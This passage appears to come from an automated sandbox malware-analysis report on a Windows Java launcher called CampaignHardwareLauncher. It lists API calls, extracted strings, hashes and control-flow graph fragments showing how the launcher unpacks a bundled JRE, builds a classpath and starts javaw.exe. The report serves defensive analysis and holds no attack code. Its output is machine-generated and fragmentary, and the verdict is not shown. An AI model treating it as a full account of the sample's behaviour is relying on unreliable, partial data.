                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateErrorExecuteForegroundHandleLastMessageModuleShellShowTimermemsetputsstrstr
                                                                                                                                                                                                                                                                                                                • String ID: --l4j-dont-wait$--l4j-no-splash$--l4j-no-splash-err$Exit code:%d$Exit code:%d, restarting the application!$STATIC
                                                                                                                                                                                                                                                                                                                • API String ID: 2862500452-2488410787
                                                                                                                                                                                                                                                                                                                • Opcode ID: ef69a45fb9a8d98a3e7d4beaa163ba7c94590803dc5b94dc991fefc783aab643
                                                                                                                                                                                                                                                                                                                • Instruction ID: 24b147bc9a002fea4a62b88368d981a48f0c15b8e85cb8378e8374e035e88a4e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef69a45fb9a8d98a3e7d4beaa163ba7c94590803dc5b94dc991fefc783aab643
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBE14CB19083018BD714EF3AD54131BBAE5AF84344F01C93FE989A73A1DB78D8519B8B

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3695137517-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 60854d5bb89194ddad18fca627b3fed1a2910dcd429b76d8ba96fdf7a2bac1dc
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9b036dcc62e5206002a8964a93b809c6819fe7ae1a2a78e05521c6610f765c41
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60854d5bb89194ddad18fca627b3fed1a2910dcd429b76d8ba96fdf7a2bac1dc
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34212AB4A053048FC704FF65D58161ABBF5BF88344F01C93EE895A73A6DB389850CB5A

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$strlen$strcat$ErrorFindLastLoadLockfprintfmemset$_findnextstrpbrkstrtok$_findclose_findfirstfwritestrcpystrncatstrncpystrrchr
                                                                                                                                                                                                                                                                                                                • String ID: " :%s$-Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd$-cla$-jar$-jar$Add classpath:%s$Resource %d:%s$org.develnext.jphp.ext.javafx.FXLauncher$sspa$th "$true
                                                                                                                                                                                                                                                                                                                • API String ID: 689643918-1455150590
                                                                                                                                                                                                                                                                                                                • Opcode ID: f3cc387d6fe282e7dd2616dd62daa608cb237d8618ec9fd67493d2c34684ebff
                                                                                                                                                                                                                                                                                                                • Instruction ID: 45e07854ae54010095be9281c7dcb4a820f195fbc1c947dc7b9175b2af9540e9
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3cc387d6fe282e7dd2616dd62daa608cb237d8618ec9fd67493d2c34684ebff
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE1261B09087018BD710AF29C54065BBBE5EF94304F0589BFE8C9AB391D77D8995CF8A

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403D50
                                                                                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32(00000003,00412360,?), ref: 00403D73
                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?,?,00404A72), ref: 00403D90
                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,00404A72), ref: 00403DA3
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403DFB
                                                                                                                                                                                                                                                                                                                • strcpy.MSVCRT ref: 00403E45
                                                                                                                                                                                                                                                                                                                • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00404A72), ref: 00403E7F
                                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00404A72), ref: 00403E98
                                                                                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32 ref: 00403EF1
                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00404A72), ref: 00403F0E
                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00404A72), ref: 00403F1D
                                                                                                                                                                                                                                                                                                                • strncpy.MSVCRT ref: 00403F89
                                                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00403F95
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT ref: 00403FBA
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 00403FD4
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 00403FF7
                                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00404A72), ref: 00404008
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 00404035
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$fprintf$ErrorFindLastLoadLockmemsetstrcpy$strcatstrlenstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: :$Bundled JRE:%s$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Resource %d:%s$\$true
                                                                                                                                                                                                                                                                                                                • API String ID: 1825146110-431872401
                                                                                                                                                                                                                                                                                                                • Opcode ID: b93b39cbe82f5e2f208a7984e44e89cdccab112937a32fab5cc704911dd864f8
                                                                                                                                                                                                                                                                                                                • Instruction ID: a351f2335a7c1ffd526f9bc51b8a145b2b5fd6ff43207c8f2e401759d570546c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b93b39cbe82f5e2f208a7984e44e89cdccab112937a32fab5cc704911dd864f8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 178160B09083019BD710AF29D54035ABFE9EF84344F05C87FE989AB3D1DB7C99558B8A

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$Resource$ErrorFindLastLoadLock_close_open_readmemsetstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: Loading:%s$Resource %d:%s$ini
                                                                                                                                                                                                                                                                                                                • API String ID: 3498103655-913749543
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1aeefc6938f78fb95fdeba6918e8ca31fde1e41f92e779772340ee2ce77c709b
                                                                                                                                                                                                                                                                                                                • Instruction ID: ffe5270cda513766b45dd1113f6f5d5a6076afea4e1b231d249c2800047aef03
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1aeefc6938f78fb95fdeba6918e8ca31fde1e41f92e779772340ee2ce77c709b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E6181B59083118BDB10AF29C58035EBFE5AF44344F05847FE9C9A7382D7789A51CB8A

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040689C
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004068BD
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT ref: 004068DA
                                                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004068E2
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT ref: 004068FE
                                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNEL32 ref: 00406941
                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,0040A01C,00000001,00000000,?,0040151F), ref: 00406994
                                                                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 004069AC
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,0040A01C,00000001,00000000,?,0040151F), ref: 004069BD
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,0040A01C,00000001,00000000,?,0040151F), ref: 004069CE
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe, xrefs: 004068C7
                                                                                                                                                                                                                                                                                                                • D, xrefs: 004068A1
                                                                                                                                                                                                                                                                                                                • -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd, xrefs: 004068F2
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandleProcessmemsetstrcat$CodeCreateExitObjectSingleWaitstrlen
                                                                                                                                                                                                                                                                                                                • String ID: -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$D

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$ErrorLast_statfprintfmemsetstrcatstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: (OK)$(not found)$Check launcher:%s %s$bin\java.exe$bin\javaw.exe

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021A0: FindResourceExA.KERNEL32 ref: 004021DD
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021A0: LoadResource.KERNEL32 ref: 004021FA
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021A0: LockResource.KERNEL32 ref: 00402209
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021A0: fprintf.MSVCRT ref: 00402253
                                                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 0040140E
                                                                                                                                                                                                                                                                                                                • CreateWindowExA.USER32 ref: 004014B1
                                                                                                                                                                                                                                                                                                                • SetTimer.USER32 ref: 004014FA
                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32 ref: 0040154A
                                                                                                                                                                                                                                                                                                                • DispatchMessageA.USER32 ref: 00401555
                                                                                                                                                                                                                                                                                                                • GetMessageA.USER32 ref: 00401572
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 004015AB
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageResource$fprintf$CreateDispatchFindLoadLockTimerTranslateWindowstrstr
                                                                                                                                                                                                                                                                                                                • String ID: --l4j-no-splash$Exit code:%d, restarting the application!$STATIC

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: _setmode$ExitProcess__p__environ__p__fmode_cexit
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2747451157-0

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 580 406a10-406a40 call 406c70 call 406c00 GetCommandLineA GetStartupInfoA 585 406a42 580->585 586 406a48-406a5b 580->586 587 406ae6-406afe GetModuleHandleA 585->587 588 406a47 586->588 589 406a5d-406a60 586->589 590 406b00 587->590 591 406b04-406b21 call 4013b0 587->591 588->586 592 406aa0-406ab3 589->592 593 406a62-406a72 589->593 590->591 592->592 597 406ab5-406ab8 592->597 595 406ac0-406acc 593->595 596 406a74-406a7a 593->596 602 406ae0-406ae4 595->602 599 406a80-406a82 596->599 600 406b22-406b26 597->600 601 406aba 597->601 599->595 604 406a84-406a98 599->604 600->595 601->595 602->587 603 406ad0-406add 602->603 603->602 604->599 605 406a9a 604->605 605->595
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CommandHandleInfoLineModuleStartup
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1628297973-0

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 606 406a9c 607 406aa0-406ab3 606->607 607->607 608 406ab5-406ab8 607->608 609 406b22-406b26 608->609 610 406aba 608->610 611 406ac0-406acc 609->611 610->611 612 406ae0-406ae4 611->612 613 406ad0-406add 612->613 614 406ae6-406afe GetModuleHandleA 612->614 613->612 615 406b00 614->615 616 406b04-406b21 call 4013b0 614->616 615->616
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-0

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 619 406ace 620 406ad0-406ae4 619->620 622 406ae6-406afe GetModuleHandleA 620->622 623 406b00 622->623 624 406b04-406b21 call 4013b0 622->624 623->624
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-0

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 627 401290-4012a3 __set_app_type call 401150 629 4012a8-4012a9 627->629
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 0040129D
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,004012A8), ref: 00401161
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: __getmainargs.MSVCRT ref: 0040119A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: _setmode.MSVCRT ref: 004011D5
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: _setmode.MSVCRT ref: 004011FB
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: __p__fmode.MSVCRT ref: 00401200
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: __p__environ.MSVCRT ref: 00401215
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: _cexit.MSVCRT ref: 00401239
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401241
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode__set_app_type_cexit
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 250851222-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: f8f8779216d611a18a63dbf5b8c311eb09e190107aa71f1f2c959bcc01329ce4
                                                                                                                                                                                                                                                                                                                • Instruction ID: f3566ed841fe2c78bbec3e3585cf37c7a6b3b3915cdcc1304e07bfa49eda4ab5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f8779216d611a18a63dbf5b8c311eb09e190107aa71f1f2c959bcc01329ce4
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3C09B3041421497C3003FB5DC0E359BBA87B05305F41443CD5C967261D67839054796
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004013DA), ref: 00401ED7
                                                                                                                                                                                                                                                                                                                • puts.MSVCRT ref: 00401F11
                                                                                                                                                                                                                                                                                                                • ShellExecuteA.SHELL32 ref: 00401F5A
                                                                                                                                                                                                                                                                                                                • printf.MSVCRT ref: 00401F89
                                                                                                                                                                                                                                                                                                                • fclose.MSVCRT ref: 00401F93
                                                                                                                                                                                                                                                                                                                • MessageBoxA.USER32 ref: 00401FBF
                                                                                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(?,?,?,?,?,?,?,?,004013DA), ref: 00401FFD
                                                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040201F
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013DA), ref: 00402040
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013DA), ref: 0040204B
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 0040206D
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Message$ErrorExecuteFormatFreeLastLocalShellfclosefprintfprintfputsstrcatstrlen
                                                                                                                                                                                                                                                                                                                • String ID: An error occurred while starting the application.$Error msg:%s$Error:%s$Open URL:%s$open
                                                                                                                                                                                                                                                                                                                • API String ID: 1449747937-1100426463
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1d01a69e9d7fb2250e9da01269d9a9a695086d462b34391a24b83a14a180ea29
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2d12064388d49b1e09197d997951df6f1fa04ecba0d9f77cc5412a013d33004a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d01a69e9d7fb2250e9da01269d9a9a695086d462b34391a24b83a14a180ea29
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5041F1B0B083019BD704EF29D68525FBAE1BB84344F11C83FE589A7391D77C89559B8B
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
